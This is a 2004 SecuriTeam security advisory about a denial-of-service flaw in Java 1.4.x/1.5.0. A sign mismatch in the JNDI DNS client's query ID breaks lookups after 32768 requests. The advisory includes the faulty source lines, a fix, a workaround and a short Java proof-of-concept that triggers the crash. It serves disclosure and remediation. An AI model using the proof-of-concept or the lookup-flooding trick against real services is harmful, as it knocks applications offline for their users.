[NEWS] Java JNI/DNS Queries DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 11/17/04

  • Next message: SecuriTeam: "[NEWS] Insecure FTP Access in HP PSC 2510 Printers" 
    To: list@securiteam.com
Date: 17 Nov 2004 16:44:36 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Java JNI/DNS Queries DoS
    ------------------------------------------------------------------------

    SUMMARY

    Due to a programming flaw in the Java JVM code it is possible to force an
    unhandled exception on a Java application if the application is tricked
    into performing many DNS queries. The result is the immediate crashing of
    the Java application.

    DETAILS

    Vulnerable Systems:
     * Java Virtual Machine version 1.4.x, 1.5.0

    Java uses an 'InitialDirContext' to perform DNS lookups. A wrap-around of
    an internal variable renders the context unusable after 32768 requests for
    the next 32768 requests. A remote attacker might trick an application into
    performing a lot of DNS requests which renders the application unusable.
    It might also be the cause of some problems with long running server
    processes.

    After 32768 such DNS requests are done without creating a new
    InitialDirContext, Java will issue the following exception:

    javax.naming.CommunicationException: DNS error: ID doesn't match;
    remaining name 'sun.com'
            at com.sun.jndi.dns.DnsClient.checkHeader(DnsClient.java:426)
            at com.sun.jndi.dns.DnsClient.query(DnsClient.java:162)
            at com.sun.jndi.dns.Resolver.query(Resolver.java:63)
            at
    com.sun.jndi.dns.DnsContext.c_getAttributes(DnsContext.java:410)
            at
    com.sun.jndi.toolkit.ctx.ComponentDirContext.p_getAttributes(ComponentDirContext.java:213)
            at
    com.sun.jndi.toolkit.ctx.PartialCompositeDirContext.getAttributes(PartialCompositeDirContext.java:121)
            at
    com.sun.jndi.toolkit.ctx.PartialCompositeDirContext.getAttributes(PartialCompositeDirContext.java:109)
            at
    javax.naming.directory.InitialDirContext.getAttributes(InitialDirContext.java:121)
            at DNSLookupBug.main(DNSLookupBug.java:17)

    In com/sun/jndi/dns/DnsClient.java, 'xid' is of type 'int' but initialized
    by the 'short' 'ident'. Thus if 'ident' reaches 32768, it becomes
    negative, rendering 'xid' negative to '-32768':
        private short ident = 0; // used to set the msg ID field
    [...]
            int xid;
            synchronized (identLock) {
                xid = ++ident;
            }

    In the class com/sun/jndi/dns/Header.java, the answer from the DNS server
    is converted backwards but to an 'int' instead of a 'short':
       private static int getShort(byte[] msg, int pos) {
            return (((msg[pos] & 0xFF) << 8) |
                    (msg[pos + 1] & 0xFF));
        }

    The result of this method gives '32768' which is not equal to '-32768' and
    therefore the failure. A possible fix would be to replace in
    com/sun/jndi/dns/Header.java:
                xid = getShort(msg, pos);
    with
                xid = (short) getShort(msg, pos);

    Workaround
    An application must be written in such a manner as to instantiate a new
    instance of 'InitialDirContext' before the limit of 32768 request is
    reached. Another solution would be to subclass InitialDirContext and let
    'xid' have only positive values.

    Proof Of Concept
    import java.util.*;
    import javax.naming.directory.*;

    public class DNSLookupBug {
        public static void main(String[] args) {
            try {
                final Hashtable env = new Hashtable();
                env.put("java.naming.factory.initial",
                        "com.sun.jndi.dns.DnsContextFactory");

                DirContext dnsContext = new InitialDirContext(env);

                final String[] domain = new String[] {"A"};
                for (int i = 0; i < 0xffff; i++) {
                    dnsContext.getAttributes("sun.com", domain);
                    if (i % 1000 == 0) {
                        // use this as a workaround
                        //dnsContext = new InitialDirContext(env);
                        System.out.println(i);
                    }
                }

            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:k.huwig@iku-ag.de> Kurt
    Huwig.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Insecure FTP Access in HP PSC 2510 Printers"

    Relevant Pages